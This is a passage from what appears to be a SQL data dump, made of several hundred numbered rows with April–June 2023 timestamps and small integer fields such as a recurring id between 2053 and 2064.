(4776, '2023-04-22 05:40:50', 1, 2064, 0, 1, 1),
(4777, '2023-04-22 07:25:55', 1, 2064, 0, 1, 1),
(4778, '2023-04-22 10:59:35', 1, 2064, 0, 1, 1),
(4779, '2023-04-23 06:42:30', 1, 2060, 0, 1, 1),
(4780, '2023-04-23 06:42:30', 1, 2058, 0, 1, 1),
(4781, '2023-04-23 06:42:31', 1, 2062, 0, 1, 1),
(4782, '2023-04-23 06:42:31', 1, 2055, 0, 1, 1),
(4783, '2023-04-24 05:10:51', 1, 2062, 0, 1, 1),
(4784, '2023-04-24 10:32:40', 1, 2064, 0, 1, 1),
(4785, '2023-04-24 17:51:28', 1, 2063, 0, 1, 1),
(4786, '2023-04-24 18:07:51', 1, 2064, 0, 1, 1),
(4787, '2023-04-24 21:45:52', 1, 2059, 0, 1, 1),
(4788, '2023-04-25 04:08:12', 1, 2059, 0, 1, 1),
(4789, '2023-04-25 04:50:39', 1, 2064, 0, 1, 1),
(4790, '2023-04-25 07:27:19', 1, 2054, 0, 1, 1),
(4791, '2023-04-25 07:27:19', 1, 2063, 0, 1, 1),
(4792, '2023-04-25 07:51:55', 1, 2064, 0, 1, 1),
(4793, '2023-04-25 07:51:58', 1, 2064, 0, 1, 1),
(4794, '2023-04-25 07:55:18', 1, 2061, 0, 1, 1),
(4795, '2023-04-25 13:02:15', 1, 2062, 0, 1, 1),
(4796, '2023-04-25 15:17:09', 1, 2054, 0, 1, 1),
(4797, '2023-04-25 15:17:10', 1, 2058, 0, 1, 1),
(4798, '2023-04-25 15:17:11', 1, 2059, 0, 1, 1),
(4799, '2023-04-25 15:17:12', 1, 2055, 0, 1, 1),
(4800, '2023-04-25 15:17:13', 1, 2060, 0, 1, 1),
(4801, '2023-04-25 15:17:14', 1, 2063, 0, 1, 1),
(4802, '2023-04-25 15:17:16', 1, 2061, 0, 1, 1),
(4803, '2023-04-25 15:17:16', 1, 2062, 0, 1, 1),
(4804, '2023-04-25 15:17:21', 1, 2064, 0, 1, 1),
(4805, '2023-04-25 15:17:31', 1, 2053, 0, 1, 1),
(4806, '2023-04-25 16:20:03', 1, 2059, 0, 1, 1),
(4807, '2023-04-25 20:42:17', 1, 2064, 0, 1, 1),
(4808, '2023-04-25 21:47:47', 1, 2060, 0, 1, 1),
(4809, '2023-04-26 04:01:18', 1, 2059, 0, 1, 1),
(4810, '2023-04-26 05:13:12', 1, 2062, 0, 1, 1),
(4811, '2023-04-26 15:00:03', 1, 2061, 0, 1, 1),
(4812, '2023-04-26 17:29:27', 1, 2061, 0, 1, 1),
(4813, '2023-04-27 08:34:24', 1, 2061, 0, 1, 1),
(4814, '2023-04-27 10:01:49', 1, 2061, 0, 1, 1),
(4815, '2023-04-27 12:10:56', 1, 2054, 0, 1, 1),
(4816, '2023-04-27 14:57:14', 1, 2061, 0, 1, 1),
(4817, '2023-04-27 23:24:43', 1, 2061, 0, 1, 1),
(4818, '2023-04-28 02:12:13', 1, 2060, 0, 1, 1),
(4819, '2023-04-28 02:21:08', 1, 2063, 0, 1, 1),
(4820, '2023-04-28 02:43:56', 1, 2058, 0, 1, 1),
(4821, '2023-04-28 03:27:02', 1, 2055, 0, 1, 1),
(4822, '2023-04-28 04:23:22', 1, 2061, 0, 1, 1),
(4823, '2023-04-28 04:40:43', 1, 2061, 0, 1, 1),
(4824, '2023-04-28 05:19:43', 1, 2062, 0, 1, 1),
(4825, '2023-04-28 06:28:51', 1, 2060, 0, 1, 1),
(4826, '2023-04-28 06:37:31', 1, 2063, 0, 1, 1),
(4827, '2023-04-28 06:59:25', 1, 2058, 0, 1, 1),
(4828, '2023-04-28 07:41:20', 1, 2055, 0, 1, 1),
(4829, '2023-04-28 08:52:41', 1, 2061, 0, 1, 1),
(4830, '2023-04-28 09:29:12', 1, 2062, 0, 1, 1),
(4831, '2023-04-28 10:26:07', 1, 2054, 0, 1, 1),
(4832, '2023-04-28 10:39:40', 1, 2054, 0, 1, 1),
(4833, '2023-04-28 10:55:24', 1, 2059, 0, 1, 1),
(4834, '2023-04-28 11:08:16', 1, 2064, 0, 1, 1),
(4835, '2023-04-28 13:27:23', 1, 2058, 0, 1, 1),
(4836, '2023-04-29 00:59:41', 1, 2061, 0, 1, 1),
(4837, '2023-04-29 02:07:14', 1, 2058, 0, 1, 1),
(4838, '2023-04-29 02:07:14', 1, 2060, 0, 1, 1),
(4839, '2023-04-29 02:07:14', 1, 2064, 0, 1, 1),
(4840, '2023-04-29 02:07:15', 1, 2063, 0, 1, 1),
(4841, '2023-04-29 02:07:20', 1, 2061, 0, 1, 1),
(4842, '2023-04-29 02:24:47', 1, 2062, 0, 1, 1),
(4843, '2023-04-29 02:24:49', 1, 2055, 0, 1, 1),
(4844, '2023-04-29 02:24:50', 1, 2054, 0, 1, 1),
(4845, '2023-04-29 02:24:51', 1, 2059, 0, 1, 1),
(4846, '2023-04-29 04:46:36', 1, 2054, 0, 1, 1),
(4847, '2023-04-29 10:03:01', 1, 2064, 0, 1, 1),
(4848, '2023-04-30 01:51:26', 1, 2061, 0, 1, 1),
(4849, '2023-04-30 04:30:13', 1, 2064, 0, 1, 1),
(4850, '2023-04-30 06:40:48', 1, 2064, 0, 1, 1),
(4851, '2023-04-30 08:32:31', 1, 2059, 0, 1, 1),
(4852, '2023-04-30 13:37:15', 1, 2064, 0, 1, 1),
(4853, '2023-04-30 19:39:37', 1, 2059, 0, 1, 1),
(4854, '2023-04-30 19:52:10', 1, 2061, 0, 1, 1),
(4855, '2023-04-30 23:19:00', 1, 2055, 0, 1, 1),
(4856, '2023-05-01 06:09:35', 1, 2053, 0, 1, 1),
(4857, '2023-05-01 07:51:51', 1, 2059, 0, 1, 1),
(4858, '2023-05-01 17:21:34', 1, 2060, 0, 1, 1),
(4859, '2023-05-01 18:37:56', 1, 2064, 0, 1, 1),
(4860, '2023-05-01 23:01:56', 1, 2061, 0, 1, 1),
(4861, '2023-05-02 00:56:07', 1, 2061, 0, 1, 1),
(4862, '2023-05-02 15:20:17', 1, 2063, 0, 1, 1),
(4863, '2023-05-02 19:53:33', 1, 2061, 0, 1, 1),
(4864, '2023-05-02 20:35:25', 1, 2063, 0, 1, 1),
(4865, '2023-05-03 01:41:23', 1, 2064, 0, 1, 1),
(4866, '2023-05-03 09:15:05', 1, 2063, 0, 1, 1),
(4867, '2023-05-03 14:31:00', 1, 2064, 0, 1, 1),
(4868, '2023-05-03 16:30:10', 1, 2064, 0, 1, 1),
(4869, '2023-05-03 16:30:25', 1, 2063, 0, 1, 1),
(4870, '2023-05-03 16:30:39', 1, 2062, 0, 1, 1),
(4871, '2023-05-03 16:30:51', 1, 2061, 0, 1, 1),
(4872, '2023-05-03 16:31:04', 1, 2060, 0, 1, 1),
(4873, '2023-05-03 16:31:21', 1, 2059, 0, 1, 1),
(4874, '2023-05-03 16:31:34', 1, 2058, 0, 1, 1),
(4875, '2023-05-03 16:31:47', 1, 2055, 0, 1, 1),
(4876, '2023-05-03 16:32:03', 1, 2054, 0, 1, 1),
(4877, '2023-05-03 16:47:16', 1, 2053, 0, 1, 1),
(4878, '2023-05-04 06:43:33', 1, 2060, 0, 1, 1),
(4879, '2023-05-04 06:54:01', 1, 2063, 0, 1, 1),
(4880, '2023-05-04 07:20:23', 1, 2058, 0, 1, 1),
(4881, '2023-05-04 08:08:15', 1, 2055, 0, 1, 1),
(4882, '2023-05-04 09:32:09', 1, 2061, 0, 1, 1),
(4883, '2023-05-04 10:16:07', 1, 2062, 0, 1, 1),
(4884, '2023-05-04 11:40:26', 1, 2054, 0, 1, 1),
(4885, '2023-05-04 11:59:41', 1, 2059, 0, 1, 1),
(4886, '2023-05-04 12:14:22', 1, 2064, 0, 1, 1),
(4887, '2023-05-04 22:27:50', 1, 2060, 0, 1, 1),
(4888, '2023-05-05 05:13:52', 1, 2060, 0, 1, 1),
(4889, '2023-05-05 05:23:37', 1, 2063, 0, 1, 1),
(4890, '2023-05-05 05:47:11', 1, 2058, 0, 1, 1),
(4891, '2023-05-05 06:30:33', 1, 2055, 0, 1, 1),
(4892, '2023-05-05 06:45:34', 1, 2064, 0, 1, 1),
(4893, '2023-05-05 07:58:40', 1, 2061, 0, 1, 1),
(4894, '2023-05-05 08:11:34', 1, 2054, 0, 1, 1),
(4895, '2023-05-05 08:51:09', 1, 2062, 0, 1, 1),
(4896, '2023-05-05 10:21:25', 1, 2054, 0, 1, 1),
(4897, '2023-05-05 10:41:10', 1, 2059, 0, 1, 1),
(4898, '2023-05-05 10:56:51', 1, 2064, 0, 1, 1),
(4899, '2023-05-05 16:58:36', 1, 2060, 0, 1, 1),
(4900, '2023-05-05 19:11:07', 1, 2064, 0, 1, 1),
(4901, '2023-05-05 23:05:33', 1, 2061, 0, 1, 1),
(4902, '2023-05-06 20:15:19', 1, 2054, 0, 1, 1),
(4903, '2023-05-06 20:15:24', 1, 2055, 0, 1, 1),
(4904, '2023-05-06 20:15:47', 1, 2064, 0, 1, 1),
(4905, '2023-05-06 20:15:51', 1, 2063, 0, 1, 1),
(4906, '2023-05-06 20:15:55', 1, 2062, 0, 1, 1),
(4907, '2023-05-06 20:15:58', 1, 2060, 0, 1, 1),
(4908, '2023-05-06 20:16:06', 1, 2059, 0, 1, 1),
(4909, '2023-05-06 20:16:10', 1, 2061, 0, 1, 1),
(4910, '2023-05-06 20:16:13', 1, 2058, 0, 1, 1),
(4911, '2023-05-07 07:21:48', 1, 2055, 0, 1, 1),
(4912, '2023-05-07 13:49:05', 1, 2060, 0, 1, 1),
(4913, '2023-05-08 12:44:23', 1, 2060, 0, 1, 1),
(4914, '2023-05-08 12:54:05', 1, 2063, 0, 1, 1),
(4915, '2023-05-08 13:18:18', 1, 2058, 0, 1, 1),
(4916, '2023-05-08 14:01:02', 1, 2055, 0, 1, 1),
(4917, '2023-05-08 15:20:25', 1, 2061, 0, 1, 1),
(4918, '2023-05-08 16:04:04', 1, 2060, 0, 1, 1),
(4919, '2023-05-08 16:16:46', 1, 2063, 0, 1, 1),
(4920, '2023-05-08 16:51:27', 1, 2060, 0, 1, 1),
(4921, '2023-05-08 17:01:10', 1, 2063, 0, 1, 1),
(4922, '2023-05-08 17:25:24', 1, 2058, 0, 1, 1),
(4923, '2023-05-08 17:50:45', 1, 2053, 0, 1, 1),
(4924, '2023-05-08 18:08:00', 1, 2055, 0, 1, 1),
(4925, '2023-05-08 19:25:45', 1, 2061, 0, 1, 1),
(4926, '2023-05-08 20:07:20', 1, 2062, 0, 1, 1),
(4927, '2023-05-08 21:22:45', 1, 2054, 0, 1, 1),
(4928, '2023-05-08 21:43:46', 1, 2059, 0, 1, 1),
(4929, '2023-05-08 21:52:45', 1, 2064, 0, 1, 1),
(4930, '2023-05-09 00:02:19', 1, 2060, 0, 1, 1),
(4931, '2023-05-09 00:11:49', 1, 2063, 0, 1, 1),
(4932, '2023-05-09 00:34:53', 1, 2058, 0, 1, 1),
(4933, '2023-05-09 00:47:09', 1, 2059, 0, 1, 1),
(4934, '2023-05-09 01:15:48', 1, 2055, 0, 1, 1),
(4935, '2023-05-09 02:31:06', 1, 2061, 0, 1, 1),
(4936, '2023-05-09 02:42:25', 1, 2063, 0, 1, 1),
(4937, '2023-05-09 03:08:17', 1, 2063, 0, 1, 1),
(4938, '2023-05-09 03:09:58', 1, 2062, 0, 1, 1),
(4939, '2023-05-09 04:22:27', 1, 2054, 0, 1, 1),
(4940, '2023-05-09 04:39:16', 1, 2059, 0, 1, 1),
(4941, '2023-05-09 04:51:38', 1, 2064, 0, 1, 1),
(4942, '2023-05-09 06:45:44', 1, 2064, 0, 1, 1),
(4943, '2023-05-09 09:29:36', 1, 2060, 0, 1, 1),
(4944, '2023-05-09 09:39:05', 1, 2063, 0, 1, 1),
(4945, '2023-05-09 09:54:43', 1, 2053, 0, 1, 1),
(4946, '2023-05-09 10:02:47', 1, 2058, 0, 1, 1),
(4947, '2023-05-09 10:13:22', 1, 2055, 0, 1, 1),
(4948, '2023-05-09 10:43:11', 1, 2055, 0, 1, 1),
(4949, '2023-05-09 11:57:34', 1, 2061, 0, 1, 1),
(4950, '2023-05-09 12:36:46', 1, 2062, 0, 1, 1),
(4951, '2023-05-09 13:50:50', 1, 2054, 0, 1, 1),
(4952, '2023-05-09 14:08:41', 1, 2059, 0, 1, 1),
(4953, '2023-05-09 14:22:22', 1, 2064, 0, 1, 1),
(4954, '2023-05-10 13:32:51', 1, 2059, 0, 1, 1),
(4955, '2023-05-10 15:27:56', 1, 2062, 0, 1, 1),
(4956, '2023-05-10 15:27:59', 1, 2062, 0, 1, 1),
(4957, '2023-05-10 15:28:04', 1, 2062, 0, 1, 1),
(4958, '2023-05-10 15:28:21', 1, 2062, 0, 1, 1),
(4959, '2023-05-10 15:29:41', 1, 2062, 0, 1, 1),
(4960, '2023-05-10 18:01:45', 1, 2063, 0, 1, 1),
(4961, '2023-05-10 23:42:03', 1, 2059, 0, 1, 1),
(4962, '2023-05-11 02:00:52', 1, 2060, 0, 1, 1),
(4963, '2023-05-11 17:18:45', 1, 2064, 0, 1, 1),
(4964, '2023-05-12 00:11:43', 1, 2062, 0, 1, 1),
(4965, '2023-05-12 04:08:19', 1, 2061, 0, 1, 1),
(4966, '2023-05-12 09:03:50', 1, 2060, 0, 1, 1),
(4967, '2023-05-12 21:20:30', 1, 2061, 0, 1, 1),
(4968, '2023-05-13 05:22:34', 1, 2061, 0, 1, 1),
(4969, '2023-05-13 05:40:35', 1, 2059, 0, 1, 1),
(4970, '2023-05-13 07:15:56', 1, 2064, 0, 1, 1),
(4971, '2023-05-13 10:03:16', 1, 2058, 0, 1, 1),
(4972, '2023-05-13 10:03:32', 1, 2064, 0, 1, 1),
(4973, '2023-05-13 10:03:44', 1, 2054, 0, 1, 1),
(4974, '2023-05-13 10:03:59', 1, 2060, 0, 1, 1),
(4975, '2023-05-13 10:04:02', 1, 2062, 0, 1, 1),
(4976, '2023-05-13 10:04:05', 1, 2055, 0, 1, 1),
(4977, '2023-05-13 10:04:17', 1, 2059, 0, 1, 1),
(4978, '2023-05-13 10:04:23', 1, 2063, 0, 1, 1),
(4979, '2023-05-13 10:04:27', 1, 2061, 0, 1, 1),
(4980, '2023-05-13 10:06:54', 1, 2058, 0, 1, 1),
(4981, '2023-05-13 10:07:05', 1, 2064, 0, 1, 1),
(4982, '2023-05-13 10:07:13', 1, 2062, 0, 1, 1),
(4983, '2023-05-13 10:07:16', 1, 2055, 0, 1, 1),
(4984, '2023-05-13 10:07:22', 1, 2054, 0, 1, 1),
(4985, '2023-05-13 10:07:26', 1, 2060, 0, 1, 1),
(4986, '2023-05-13 10:07:30', 1, 2059, 0, 1, 1),
(4987, '2023-05-13 10:07:32', 1, 2063, 0, 1, 1),
(4988, '2023-05-13 10:07:34', 1, 2061, 0, 1, 1),
(4989, '2023-05-13 10:07:50', 1, 2053, 0, 1, 1),
(4990, '2023-05-13 19:30:58', 1, 2055, 0, 1, 1),
(4991, '2023-05-13 22:36:00', 1, 2061, 0, 1, 1),
(4992, '2023-05-14 04:07:33', 1, 2064, 0, 1, 1),
(4993, '2023-05-14 12:02:49', 1, 2054, 0, 1, 1),
(4994, '2023-05-14 12:02:50', 1, 2060, 0, 1, 1),
(4995, '2023-05-14 12:02:52', 1, 2062, 0, 1, 1),
(4996, '2023-05-14 12:02:53', 1, 2058, 0, 1, 1),
(4997, '2023-05-14 12:02:54', 1, 2059, 0, 1, 1),
(4998, '2023-05-14 12:02:55', 1, 2061, 0, 1, 1),
(4999, '2023-05-14 12:02:57', 1, 2055, 0, 1, 1),
(5000, '2023-05-14 12:02:58', 1, 2064, 0, 1, 1),
(5001, '2023-05-14 12:03:00', 1, 2063, 0, 1, 1),
(5002, '2023-05-14 12:03:10', 1, 2053, 0, 1, 1),
(5003, '2023-05-14 17:58:06', 1, 2064, 0, 1, 1),
(5004, '2023-05-15 07:08:50', 1, 2064, 0, 1, 1),
(5005, '2023-05-15 08:12:15', 1, 2054, 0, 1, 1),
(5006, '2023-05-15 15:32:43', 1, 2061, 0, 1, 1),
(5007, '2023-05-15 17:28:40', 1, 2054, 0, 1, 1),
(5008, '2023-05-15 17:28:48', 1, 2055, 0, 1, 1),
(5009, '2023-05-15 17:29:11', 1, 2064, 0, 1, 1),
(5010, '2023-05-15 17:29:17', 1, 2063, 0, 1, 1),
(5011, '2023-05-15 17:29:24', 1, 2062, 0, 1, 1),
(5012, '2023-05-15 17:29:33', 1, 2060, 0, 1, 1),
(5013, '2023-05-15 17:29:39', 1, 2059, 0, 1, 1),
(5014, '2023-05-15 17:29:46', 1, 2061, 0, 1, 1),
(5015, '2023-05-15 17:29:52', 1, 2058, 0, 1, 1),
(5016, '2023-05-15 19:33:26', 1, 2058, 0, 1, 1),
(5017, '2023-05-16 01:34:58', 1, 2064, 0, 1, 1),
(5018, '2023-05-16 01:56:20', 1, 2055, 0, 1, 1),
(5019, '2023-05-16 16:47:30', 1, 2061, 0, 1, 1),
(5020, '2023-05-16 20:39:46', 1, 2059, 0, 1, 1),
(5021, '2023-05-16 21:41:53', 1, 2053, 0, 1, 1),
(5022, '2023-05-17 01:20:08', 1, 2054, 0, 1, 1),
(5023, '2023-05-17 01:51:48', 1, 2060, 0, 1, 1),
(5024, '2023-05-17 02:23:19', 1, 2061, 0, 1, 1),
(5025, '2023-05-17 03:15:54', 1, 2059, 0, 1, 1),
(5026, '2023-05-17 03:59:03', 1, 2064, 0, 1, 1),
(5027, '2023-05-17 04:31:16', 1, 2062, 0, 1, 1),
(5028, '2023-05-17 05:21:18', 1, 2055, 0, 1, 1),
(5029, '2023-05-17 06:11:04', 1, 2063, 0, 1, 1),
(5030, '2023-05-17 06:24:25', 1, 2058, 0, 1, 1),
(5031, '2023-05-17 06:45:40', 1, 2063, 0, 1, 1),
(5032, '2023-05-17 09:18:19', 1, 2054, 0, 1, 1),
(5033, '2023-05-17 10:58:24', 1, 2063, 0, 1, 1),
(5034, '2023-05-17 13:26:02', 1, 2059, 0, 1, 1),
(5035, '2023-05-17 14:42:04', 1, 2061, 0, 1, 1),
(5036, '2023-05-17 14:42:06', 1, 2061, 0, 1, 1),
(5037, '2023-05-17 16:50:39', 1, 2062, 0, 1, 1),
(5038, '2023-05-17 17:42:48', 1, 2062, 0, 1, 1),
(5039, '2023-05-18 14:49:59', 1, 2064, 0, 1, 1),
(5040, '2023-05-18 18:30:41', 1, 2063, 0, 1, 1),
(5041, '2023-05-19 02:57:07', 1, 2053, 0, 1, 1),
(5042, '2023-05-19 11:12:46', 1, 2062, 0, 1, 1),
(5043, '2023-05-19 13:51:59', 1, 2064, 0, 1, 1),
(5044, '2023-05-19 16:13:04', 1, 2054, 0, 1, 1),
(5045, '2023-05-19 16:36:33', 1, 2062, 0, 1, 1),
(5046, '2023-05-19 16:45:36', 1, 2054, 0, 1, 1),
(5047, '2023-05-19 23:49:45', 1, 2059, 0, 1, 1),
(5048, '2023-05-20 16:06:09', 1, 2060, 0, 1, 1),
(5049, '2023-05-21 03:04:18', 1, 2064, 0, 1, 1),
(5050, '2023-05-21 03:58:49', 1, 2059, 0, 1, 1),
(5051, '2023-05-21 14:48:29', 1, 2064, 0, 1, 1),
(5052, '2023-05-21 15:06:50', 1, 2060, 0, 1, 1),
(5053, '2023-05-21 21:01:36', 1, 2061, 0, 1, 1),
(5054, '2023-05-21 21:04:50', 1, 2055, 0, 1, 1),
(5055, '2023-05-21 22:04:25', 1, 2064, 0, 1, 1),
(5056, '2023-05-22 00:59:38', 1, 2053, 0, 1, 1),
(5057, '2023-05-22 01:00:18', 1, 2063, 0, 1, 1),
(5058, '2023-05-22 01:00:30', 1, 2062, 0, 1, 1),
(5059, '2023-05-22 01:00:38', 1, 2060, 0, 1, 1),
(5060, '2023-05-22 01:00:45', 1, 2059, 0, 1, 1),
(5061, '2023-05-22 01:10:51', 1, 2060, 0, 1, 1),
(5062, '2023-05-22 08:25:01', 1, 2060, 0, 1, 1),
(5063, '2023-05-22 11:08:12', 1, 2055, 0, 1, 1),
(5064, '2023-05-22 16:42:17', 1, 2064, 0, 1, 1),
(5065, '2023-05-22 17:30:49', 1, 2061, 0, 1, 1),
(5066, '2023-05-23 02:29:57', 1, 2062, 0, 1, 1),
(5067, '2023-05-23 06:03:35', 1, 2055, 0, 1, 1),
(5068, '2023-05-24 07:46:50', 1, 2063, 0, 1, 1),
(5069, '2023-05-24 20:09:21', 1, 2054, 0, 1, 1),
(5070, '2023-05-24 21:34:37', 1, 2053, 0, 1, 1),
(5071, '2023-05-24 21:34:37', 1, 2059, 0, 1, 1),
(5072, '2023-05-24 23:54:54', 1, 2062, 0, 1, 1),
(5073, '2023-05-25 09:09:56', 1, 2063, 0, 1, 1),
(5074, '2023-05-25 10:17:03', 1, 2062, 0, 1, 1),
(5075, '2023-05-25 10:17:04', 1, 2054, 0, 1, 1),
(5076, '2023-05-25 10:17:05', 1, 2063, 0, 1, 1),
(5077, '2023-05-25 10:17:06', 1, 2061, 0, 1, 1),
(5078, '2023-05-25 10:17:06', 1, 2055, 0, 1, 1),
(5079, '2023-05-25 10:17:08', 1, 2060, 0, 1, 1),
(5080, '2023-05-25 10:17:09', 1, 2059, 0, 1, 1),
(5081, '2023-05-25 10:18:45', 1, 2058, 0, 1, 1),
(5082, '2023-05-25 10:18:47', 1, 2064, 0, 1, 1),
(5083, '2023-05-25 19:55:27', 1, 2064, 0, 1, 1),
(5084, '2023-05-25 20:33:59', 1, 2059, 0, 1, 1),
(5085, '2023-05-26 15:04:38', 1, 2064, 0, 1, 1),
(5086, '2023-05-27 01:05:26', 1, 2061, 0, 1, 1),
(5087, '2023-05-27 08:52:20', 1, 2063, 0, 1, 1),
(5088, '2023-05-27 15:19:41', 1, 2054, 0, 1, 1),
(5089, '2023-05-27 17:48:01', 1, 2055, 0, 1, 1),
(5090, '2023-05-27 18:48:42', 1, 2064, 0, 1, 1),
(5091, '2023-05-28 09:20:02', 1, 2058, 0, 1, 1),
(5092, '2023-05-28 19:27:51', 1, 2064, 0, 1, 1),
(5093, '2023-05-28 19:29:05', 1, 2064, 0, 1, 1),
(5094, '2023-05-29 04:50:45', 1, 2059, 0, 1, 1),
(5095, '2023-05-29 07:03:10', 1, 2060, 0, 1, 1),
(5096, '2023-05-30 03:43:19', 1, 2054, 0, 1, 1),
(5097, '2023-05-30 03:43:21', 1, 2055, 0, 1, 1),
(5098, '2023-05-30 03:43:29', 1, 2064, 0, 1, 1),
(5099, '2023-05-30 03:43:36', 1, 2063, 0, 1, 1),
(5100, '2023-05-30 03:43:37', 1, 2062, 0, 1, 1),
(5101, '2023-05-30 03:43:41', 1, 2060, 0, 1, 1),
(5102, '2023-05-30 03:43:46', 1, 2059, 0, 1, 1),
(5103, '2023-05-30 03:43:47', 1, 2061, 0, 1, 1),
(5104, '2023-05-30 03:43:48', 1, 2058, 0, 1, 1),
(5105, '2023-05-30 05:46:16', 1, 2054, 0, 1, 1),
(5106, '2023-05-30 07:17:20', 1, 2060, 0, 1, 1),
(5107, '2023-05-30 07:26:15', 1, 2063, 0, 1, 1),
(5108, '2023-05-30 07:36:42', 1, 2064, 0, 1, 1),
(5109, '2023-05-30 07:36:52', 1, 2063, 0, 1, 1),
(5110, '2023-05-30 07:37:03', 1, 2062, 0, 1, 1),
(5111, '2023-05-30 07:37:13', 1, 2061, 0, 1, 1),
(5112, '2023-05-30 07:37:25', 1, 2060, 0, 1, 1),
(5113, '2023-05-30 07:37:32', 1, 2059, 0, 1, 1),
(5114, '2023-05-30 07:37:41', 1, 2058, 0, 1, 1),
(5115, '2023-05-30 07:37:48', 1, 2055, 0, 1, 1),
(5116, '2023-05-30 07:37:55', 1, 2054, 0, 1, 1),
(5117, '2023-05-30 07:39:35', 1, 2053, 0, 1, 1),
(5118, '2023-05-30 07:49:26', 1, 2058, 0, 1, 1),
(5119, '2023-05-30 07:52:03', 1, 2062, 0, 1, 1),
(5120, '2023-05-30 08:20:40', 1, 2060, 0, 1, 1),
(5121, '2023-05-30 08:29:17', 1, 2063, 0, 1, 1),
(5122, '2023-05-30 08:51:27', 1, 2058, 0, 1, 1),
(5123, '2023-05-30 09:50:29', 1, 2055, 0, 1, 1),
(5124, '2023-05-30 11:16:17', 1, 2061, 0, 1, 1),
(5125, '2023-05-30 11:56:36', 1, 2062, 0, 1, 1),
(5126, '2023-05-30 13:10:28', 1, 2054, 0, 1, 1),
(5127, '2023-05-30 13:25:43', 1, 2059, 0, 1, 1),
(5128, '2023-05-30 13:38:23', 1, 2064, 0, 1, 1),
(5129, '2023-05-30 21:04:23', 1, 2055, 0, 1, 1),
(5130, '2023-05-30 22:26:17', 1, 2064, 0, 1, 1),
(5131, '2023-05-31 04:09:16', 1, 2064, 0, 1, 1),
(5132, '2023-05-31 04:43:57', 1, 2061, 0, 1, 1),
(5133, '2023-05-31 08:15:25', 1, 2060, 0, 1, 1),
(5134, '2023-05-31 12:41:38', 1, 2055, 0, 1, 1),
(5135, '2023-05-31 15:10:03', 1, 2063, 0, 1, 1),
(5136, '2023-05-31 16:42:54', 1, 2063, 0, 1, 1),
(5137, '2023-05-31 16:43:21', 5, 2063, 67, 0, 1),
(5138, '2023-06-01 05:05:55', 1, 2063, 0, 1, 1),
(5139, '2023-06-01 12:04:38', 1, 2062, 0, 1, 1),
(5140, '2023-06-01 14:15:52', 1, 2054, 0, 1, 1),
(5141, '2023-06-01 14:43:48', 1, 2054, 0, 1, 1),
(5142, '2023-06-01 14:44:05', 1, 2055, 0, 1, 1),
(5143, '2023-06-01 14:45:16', 1, 2064, 0, 1, 1),
(5144, '2023-06-01 14:45:35', 1, 2063, 0, 1, 1),
(5145, '2023-06-01 14:45:53', 1, 2062, 0, 1, 1),
(5146, '2023-06-01 14:46:12', 1, 2060, 0, 1, 1),
(5147, '2023-06-01 14:46:30', 1, 2059, 0, 1, 1),
(5148, '2023-06-01 14:46:48', 1, 2061, 0, 1, 1),
(5149, '2023-06-01 14:47:06', 1, 2058, 0, 1, 1),
(5150, '2023-06-01 20:47:04', 1, 2063, 0, 1, 1),
(5151, '2023-06-01 20:47:45', 1, 2063, 0, 1, 1),
(5152, '2023-06-01 20:47:59', 1, 2063, 0, 1, 1),
(5153, '2023-06-01 23:27:36', 1, 2055, 0, 1, 1),
(5154, '2023-06-02 01:08:38', 1, 2062, 0, 1, 1),
(5155, '2023-06-02 12:41:43', 1, 2061, 0, 1, 1),
(5156, '2023-06-02 22:12:28', 1, 2054, 0, 1, 1),
(5157, '2023-06-03 09:13:24', 1, 2064, 0, 1, 1),
(5158, '2023-06-03 10:21:13', 1, 2059, 0, 1, 1),
(5159, '2023-06-03 17:40:40', 1, 2062, 0, 1, 1),
(5160, '2023-06-03 19:40:54', 1, 2053, 0, 1, 1),
(5161, '2023-06-04 13:05:39', 1, 2064, 0, 1, 1),
(5162, '2023-06-04 13:48:44', 1, 2064, 0, 1, 1),
(5163, '2023-06-04 18:32:23', 1, 2053, 0, 1, 1),
(5164, '2023-06-05 03:51:01', 1, 2055, 0, 1, 1),
(5165, '2023-06-05 06:52:13', 1, 2064, 0, 1, 1),
(5166, '2023-06-05 14:33:29', 1, 2054, 0, 1, 1),
(5167, '2023-06-06 04:55:04', 1, 2055, 0, 1, 1),
(5168, '2023-06-06 06:41:48', 1, 2054, 0, 1, 1),
(5169, '2023-06-06 06:41:52', 1, 2059, 0, 1, 1),
(5170, '2023-06-06 06:41:56', 1, 2061, 0, 1, 1),
(5171, '2023-06-06 06:41:59', 1, 2058, 0, 1, 1),
(5172, '2023-06-06 15:26:32', 1, 2055, 0, 1, 1),
(5173, '2023-06-06 16:16:22', 1, 2055, 0, 1, 1),
(5174, '2023-06-06 16:16:32', 1, 2055, 0, 1, 1),
(5175, '2023-06-07 05:44:11', 1, 2054, 0, 1, 1),
(5176, '2023-06-08 04:20:51', 1, 2060, 0, 1, 1),
(5177, '2023-06-08 14:22:27', 1, 2064, 0, 1, 1),
(5178, '2023-06-09 03:25:34', 1, 2064, 0, 1, 1),
(5179, '2023-06-09 18:46:01', 1, 2060, 0, 1, 1),
(5180, '2023-06-10 08:01:52', 1, 2060, 0, 1, 1),
(5181, '2023-06-10 08:08:17', 1, 2060, 0, 1, 1),
(5182, '2023-06-10 08:39:49', 1, 2053, 0, 1, 1),
(5183, '2023-06-10 10:00:55', 1, 2064, 0, 1, 1),
(5184, '2023-06-10 13:45:45', 1, 2064, 0, 1, 1),
(5185, '2023-06-10 23:11:36', 1, 2062, 0, 1, 1),
(5186, '2023-06-11 01:00:26', 1, 2055, 0, 1, 1),
(5187, '2023-06-11 01:00:36', 1, 2064, 0, 1, 1),
(5188, '2023-06-11 01:00:45', 1, 2061, 0, 1, 1),
(5189, '2023-06-11 01:00:51', 1, 2058, 0, 1, 1),
(5190, '2023-06-11 01:44:50', 1, 2062, 0, 1, 1),
(5191, '2023-06-11 04:16:51', 1, 2064, 0, 1, 1),
(5192, '2023-06-11 06:27:52', 1, 2058, 0, 1, 1),
(5193, '2023-06-11 07:31:37', 1, 2064, 0, 1, 1),
(5194, '2023-06-11 14:43:19', 1, 2058, 0, 1, 1),
(5195, '2023-06-11 18:37:10', 1, 2062, 0, 1, 1),
(5196, '2023-06-11 18:37:11', 1, 2059, 0, 1, 1),
(5197, '2023-06-12 00:10:26', 1, 2054, 0, 1, 1),
(5198, '2023-06-12 00:26:33', 1, 2059, 0, 1, 1),
(5199, '2023-06-12 02:00:56', 1, 2061, 0, 1, 1),
(5200, '2023-06-12 22:48:00', 1, 2064, 0, 1, 1),
(5201, '2023-06-12 22:48:18', 1, 2063, 0, 1, 1),
(5202, '2023-06-12 22:48:29', 1, 2062, 0, 1, 1),
(5203, '2023-06-12 22:48:42', 1, 2061, 0, 1, 1),
